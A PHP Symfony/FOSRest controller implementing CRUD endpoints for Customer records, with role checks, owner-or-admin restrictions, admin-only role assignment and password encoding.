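<?php

namespace AppBundle\Controller\Api;

use AppBundle\Entity\Address;
use AppBundle\Entity\Customer;
use AppBundle\Form\AddressType;
use AppBundle\Form\CustomerType;
use FOS\RestBundle\Controller\Annotations as Rest;
use FOS\RestBundle\Controller\FOSRestController;
use Nelmio\ApiDocBundle\Annotation as Doc;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Security;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;

/**
 * REST endpoints for the Customer resource: list, show, create, update and
 * deactivate ("delete").
 *
 * Authorization as implemented in this controller:
 *  - listAction / showAction: ROLE_SUPER_ADMIN only (route annotation).
 *  - createAction: no @Security annotation on the route, i.e. the endpoint is
 *    reachable without an admin token. For that reason the "roles" field of
 *    the payload is only honoured for callers that already hold
 *    ROLE_SUPER_ADMIN (see applyRequestedRoles()); otherwise any caller could
 *    register itself with an arbitrary role.
 *  - updateAction / deleteAction: ROLE_CUSTOMER, restricted to the caller's
 *    own record unless the caller is ROLE_SUPER_ADMIN.
 */
class CustomerController extends FOSRestController
{
    /**
     * Get the list of all customers
     *
     * @Rest\Get("/customers")
     * @Rest\View(
     *     statusCode = Response::HTTP_OK,
     *     SerializerGroups = {"LIST"}
     * )
     * @Doc\ApiDoc(
     *     section="Customers (For Authenticated staffs only)",
     *     resource=true,
     *     description="Get the list of all customers.",
     * )
     * @Security("has_role('ROLE_SUPER_ADMIN')")
     *
     * @return Customer[] Every customer row, serialized with the LIST group
     */
    public function listAction()
    {
        return $this
            ->getDoctrine()
            ->getRepository('AppBundle:Customer')
            ->findAll();
    }

    /**
     * Get one customer
     *
     * @Rest\Get("/customers/{id}")
     * @Rest\View(
     *     statusCode = Response::HTTP_OK,
     *     SerializerGroups = {"LIST", "CUSTOMER_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Customers (For Authenticated staffs only)",
     *     resource=true,
     *     description="Get one customer.",
     * )
     * @Security("has_role('ROLE_SUPER_ADMIN')")
     *
     * @param Customer $customer The customer matching the {id} route parameter
     *                           (presumably resolved by the ParamConverter)
     *
     * @return Customer
     */
    public function showAction(Customer $customer)
    {
        return $customer;
    }

    /**
     * Create a customer
     *
     * @Rest\Post("/customers")
     * @Rest\View(
     *     statusCode = Response::HTTP_CREATED,
     *     SerializerGroups = {"LIST", "CUSTOMER_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Customers (For Authenticated staffs only)",
     *     resource=true,
     *     description="Create a customer.",
     *     input = {
     *         "class"="AppBundle\Form\CustomerType",
     *     }
     * )
     *
     * @param Request $request Body fields are bound to CustomerType; an optional
     *                         "address" sub-array is bound to AddressType and an
     *                         optional "roles" field is applied for admins only
     *
     * @return Customer|\FOS\RestBundle\View\View|JsonResponse The persisted customer,
     *         a 400 view with the validation errors, or a 403 when a non-admin
     *         tries to set roles
     */
    public function createAction(Request $request)
    {
        $customer = new Customer();
        if (null !== $errors = $this->submitCustomer($request, $customer)) {
            return $errors;
        }

        // An Address is always attached, even when none was submitted (same as
        // the previous behaviour); it is only bound/validated when present.
        $address = new Address();
        if ($request->request->has('address')) {
            if (null !== $errors = $this->submitAddress($request, $address)) {
                return $errors;
            }
        }

        if (null !== $denied = $this->applyRequestedRoles($request, $customer)) {
            return $denied;
        }

        // Never store the hash of an absent/empty password; updateAction already
        // guards its re-encoding the same way.
        if (!$this->hasPlainPassword($customer)) {
            return new JsonResponse(['error' => 'A password is required'], Response::HTTP_BAD_REQUEST);
        }
        $this->encodePlainPassword($customer);

        $customer->setAddress($address);

        // TODO: handle the 'createdBy' attribute — a customer may be created by
        // someone other than themselves.

        $this->save($customer);

        // TODO: create the customer's public/private key pair once the
        // 'etravel.pki.node.server' service (createAndSaveCustumerCert) is wired in.

        return $customer;
    }

    /**
     * Update a customer
     *
     * @Rest\Put("/customers/{id}")
     * @Rest\View(
     *     statusCode = Response::HTTP_ACCEPTED,
     *     SerializerGroups = {"LIST", "CUSTOMER_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Customers (For Authenticated staffs only)",
     *     resource=true,
     *     description="Update a customer.",
     *     input = {
     *         "class"="AppBundle\Form\CustomerType",
     *     }
     * )
     * @Security("has_role('ROLE_CUSTOMER')")
     *
     * @param Request  $request  Partial payload (form submitted with clearMissing=false)
     * @param Customer $customer The customer matching the {id} route parameter
     *
     * @return Customer|\FOS\RestBundle\View\View|JsonResponse The updated customer,
     *         a 400 view with validation errors, or an error JSON response when
     *         the caller may not modify this record / set roles
     */
    public function updateAction(Request $request, Customer $customer)
    {
        if (null !== $denied = $this->denyUnlessOwnerOrAdmin($customer, "Cannot update another user's data")) {
            return $denied;
        }

        if (null !== $errors = $this->submitCustomer($request, $customer)) {
            return $errors;
        }

        if ($request->request->has('address')) {
            $address = $customer->getAddress();
            // createAction always attaches an Address, but guard against a row
            // without one so the address form is never bound to null.
            if (null === $address) {
                $address = new Address();
                $customer->setAddress($address);
            }
            if (null !== $errors = $this->submitAddress($request, $address)) {
                return $errors;
            }
        }

        // Only re-encode when the caller actually supplied a new password.
        if ($this->hasPlainPassword($customer)) {
            $this->encodePlainPassword($customer);
        }

        if (null !== $denied = $this->applyRequestedRoles($request, $customer)) {
            return $denied;
        }

        $this->save($customer);

        return $customer;
    }

    /**
     * Delete (Deactivate) a customer
     *
     * @Rest\Delete("/customers/{id}")
     * @Rest\View(
     *     statusCode = Response::HTTP_NO_CONTENT
     * )
     * @Doc\ApiDoc(
     *     section="Customers (For Authenticated staffs only)",
     *     resource=true,
     *     description="Delete a customer.",
     * )
     * @Security("has_role('ROLE_CUSTOMER')")
     *
     * @param Customer $customer The customer matching the {id} route parameter
     *
     * @return Response An empty 204 response, or an error JSON response when the
     *                  caller is neither the customer nor ROLE_SUPER_ADMIN
     */
    public function deleteAction(Customer $customer)
    {
        if (null !== $denied = $this->denyUnlessOwnerOrAdmin($customer, "Cannot delete another user's data")) {
            return $denied;
        }

        // Soft delete: the row is kept and flagged inactive.
        $customer->setIsActive(false);
        $this->save($customer);

        // A Response returned directly bypasses the @Rest\View status code, so the
        // 204 has to be set here explicitly (the old JsonResponse('') was a 200).
        return new Response('', Response::HTTP_NO_CONTENT);
    }

    /**
     * Whether the current security token carries ROLE_SUPER_ADMIN.
     *
     * The token check exists because createAction has no @Security annotation,
     * so there may be no token at all; isGranted() is only consulted when one
     * is present.
     *
     * @return bool
     */
    private function isSuperAdmin()
    {
        if (null === $this->get('security.token_storage')->getToken()) {
            return false;
        }

        return $this->get('security.authorization_checker')->isGranted('ROLE_SUPER_ADMIN');
    }

    /**
     * Refuses the request when the caller is neither ROLE_SUPER_ADMIN nor the
     * customer being modified.
     *
     * @param Customer $customer The record the caller wants to modify
     * @param string   $message  Error text placed in the JSON body
     *
     * @return JsonResponse|null The error response to return, or null when access is allowed
     */
    private function denyUnlessOwnerOrAdmin(Customer $customer, $message)
    {
        if ($this->isSuperAdmin()) {
            return null;
        }

        $connectedUser = $this->get('security.token_storage')->getToken()->getUser();
        if ($customer->isEqualTo($connectedUser)) {
            return null;
        }

        // Kept at 405 for compatibility with existing clients; 403 Forbidden
        // would be the conventional status for an authorization failure.
        return new JsonResponse(['error' => $message], Response::HTTP_METHOD_NOT_ALLOWED);
    }

    /**
     * Applies the "roles" field of the payload, if present, to the customer.
     *
     * Only ROLE_SUPER_ADMIN may assign roles. Without this check a
     * self-registering caller (createAction) or a ROLE_CUSTOMER (updateAction)
     * could grant itself ROLE_SUPER_ADMIN through the request body.
     *
     * @param Request  $request
     * @param Customer $customer
     *
     * @return JsonResponse|null A 403 response when a non-admin sent "roles", null otherwise
     */
    private function applyRequestedRoles(Request $request, Customer $customer)
    {
        if (!$request->request->has('roles')) {
            return null;
        }

        if (!$this->isSuperAdmin()) {
            return new JsonResponse(['error' => 'Only an administrator can assign roles'], Response::HTTP_FORBIDDEN);
        }

        $customer->setRoles($request->request->get('roles'));

        return null;
    }

    /**
     * Binds the whole request body onto $customer via CustomerType and validates it.
     *
     * @param Request  $request
     * @param Customer $customer
     *
     * @return \FOS\RestBundle\View\View|null A 400 view with the violation list, or null when valid
     */
    private function submitCustomer(Request $request, Customer $customer)
    {
        $form = $this->createForm(CustomerType::class, $customer);
        // clearMissing=false: fields absent from the payload keep their current value
        $form->submit($request->request->all(), false);

        $listErrors = $this->get('validator')->validate($customer);
        if (count($listErrors)) {
            return $this->view($listErrors, Response::HTTP_BAD_REQUEST);
        }

        return null;
    }

    /**
     * Binds the "address" sub-payload onto $address via AddressType and validates it.
     *
     * @param Request $request
     * @param Address $address
     *
     * @return \FOS\RestBundle\View\View|null A 400 view with the violation list, or null when valid
     */
    private function submitAddress(Request $request, Address $address)
    {
        $form = $this->createForm(AddressType::class, $address);
        $form->submit($request->get('address'), false);

        $listErrors = $this->get('validator')->validate($address);
        if (count($listErrors)) {
            return $this->view($listErrors, Response::HTTP_BAD_REQUEST);
        }

        return null;
    }

    /**
     * Whether a non-empty plain-text password was supplied on the customer.
     *
     * @param Customer $customer
     *
     * @return bool
     */
    private function hasPlainPassword(Customer $customer)
    {
        $plain = $customer->getPlainPassword();

        return null !== $plain && '' !== $plain;
    }

    /**
     * Replaces the stored password with the encoded form of the plain password.
     *
     * @param Customer $customer
     */
    private function encodePlainPassword(Customer $customer)
    {
        $encoder = $this->get('security.password_encoder');
        $customer->setPassword($encoder->encodePassword($customer, $customer->getPlainPassword()));
    }

    /**
     * Persists and flushes the customer through the Doctrine entity manager.
     *
     * @param Customer $customer
     */
    private function save(Customer $customer)
    {
        $em = $this->getDoctrine()->getManager();
        $em->persist($customer);
        $em->flush();
    }
}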